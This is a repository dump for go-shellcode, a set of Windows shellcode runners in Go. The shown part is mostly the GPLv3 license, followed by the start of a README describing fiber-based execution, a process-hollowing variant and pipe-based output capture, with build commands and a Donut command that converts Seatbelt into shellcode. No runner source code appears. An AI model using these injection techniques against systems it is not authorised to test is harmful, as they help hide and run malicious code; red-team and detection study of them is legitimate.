├── LICENSE ├── README.MD ├── cmd ├── CreateFiber │ └── main.go ├── CreateProcess │ └── main.go ├── CreateProcessWithPipe │ └── main.go ├── CreateRemoteThread │ └── main.go ├── CreateRemoteThreadNative │ └── main.go ├── CreateThread │ └── main.go ├── CreateThreadNative │ └── main.go ├── EarlyBird │ └── main.go ├── EnumerateLoadedModules │ └── main.go ├── EtwpCreateEtwThread │ └── main.go ├── NtQueueApcThreadEx-Local │ └── main.go ├── RtlCreateUserThread │ └── main.go ├── ShellcodeUtils │ └── main.go ├── Syscall │ └── main.go └── UuidFromString │ └── main.go ├── go.mod └── go.sum /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 | # go-shellcode 2 | 3 | `go-shellcode` is a repository of Windows Shellcode runners and supporting utilities. The applications load and execute Shellcode using various API calls or techniques. 4 | 5 | The available Shellcode runners include: 6 | 7 | * [CreateFiber](#CreateFiber) 8 | * [CreateProcess](#CreateProcess) 9 | * [CreateProcessWithPipe](#CreateProcessWithPipe) 10 | * [CreateRemoteThread](#CreateRemoteThred) 11 | * [CreateRemoteThreadNative](#CreateRemoteThreadNative) 12 | * [CreateThread](#CreateThread) 13 | * [CreateThreadNative](#CreateThreadNative) 14 | * [EarlyBird](#EarlyBird) 15 | * [EtwpCreateEtwThread](#EtwpCreateEtwThread) 16 | * [NtQueueApcThreadEx (local)](#NtQueueApcThreadEx-(local)) 17 | * [RtlCreateUserThread](#RtlCreateUserThread) 18 | * [Syscall](#Syscall) 19 | * [Shellcode Utils](#ShellcodeUtils) 20 | * [UuidFromStringA](#UuidFromStringA) 21 | 22 | ## CreateFiber 23 | 24 | This application leverages the Windows [CreateFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfiber) function from the `Kernel32.dll` to execute shellcode within this application's process. This is usefull when you want to avoid remote process injection and want to avoid calling `CreateThread`. This application **DOES NOT** leverage functions from the `golang.org/x/sys/windows` package. The most significant difference is that this application loads all the necessary DLLs and Procedures itself and uses the procedure's Call() function. 25 | 26 | **NOTE:** I have not figured out way to have the process exit and you will have to manually terminate it. 27 | 28 | The application can be compiled with the following command on a Windows host from the project's root directory: 29 | 30 | `set GOOS=windows GOARCH=amd64;go build -o CreateFiber.exe .\cmd\CreateFiber\main.go` 31 | 32 | ## CreateProcess 33 | 34 | This application leverages the Windows [CreateProcess](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessw) function from `Kernel32.dll`. The process is created in a suspended state, the [AddressOfEntryPoint](https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_optional_header32) in the `IMAGE_OPTIONAL_HEADER` structure is updated to execute shellcode in the childprocess, and then the process is resumed. This is a type of process hollowing but the existing PE is **NOT** unmapped and the ThreadContext is **NOT** updated. The provided shellcode architecture (i.e. x86 or x64) must match the architecture of the child process. 35 | 36 | The application can be compiled with the following command on a Windows host from the project's root directory: 37 | 38 | `set GOOS=windows GOARCH=amd64;go build -o CreateProcess.exe .\cmd\CreateProcess\main.go` 39 | 40 | ## CreateProcessWithPipe 41 | 42 | This application leverages the Windows [CreateProcess](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessw) function from `Kernel32.dll`. The process is created in a suspended state, the [AddressOfEntryPoint](https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_optional_header32) in the `IMAGE_OPTIONAL_HEADER` structure is updated to execute shellcode in the childprocess, and then the process is resumed. This is a type of process hollowing but the existing PE is **NOT** unmapped and the ThreadContext is **NOT** updated. The provided shellcode architecture (i.e. x86 or x64) must match the architecture of the child process. 43 | 44 | This application differs from [CreateProcess](#CreateProcess) because it will collect any data written to **STDOUT** or **STDERR** in the child process and return it to the parent process. Data is collected by using the [CreatePipe](https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-createpipe 45 | ) function to create an anonymous pipe that the parent and child process communicate over. This is usefull when using tools like [Donut](https://github.com/TheWover/donut) to execute a .NET assembly in a child process as shellcode and to retrieve the output of the executed program. The following command can be used to generate position-independent shellcode to run [Seatbelt](https://github.com/GhostPack/Seatbelt) with Donut [v0.9.3](https://github.com/TheWover/donut/releases/tag/v0.9.3): 46 | 47 | `.\donut.exe -o donut_v0.9.3_Seatbelt.bin -x 2 -c Seatbelt.Program -m Main -p "ARPTable" Seatbelt.exe` 48 | 49 | The application can be compiled with the following command on a Windows host from the project's root directory: 50 | 51 | `set GOOS=windows GOARCH=amd64;go build -o CreateProcessWithPipe.exe .\cmd\CreateProcessWithPipe\main.go` 52 | 53 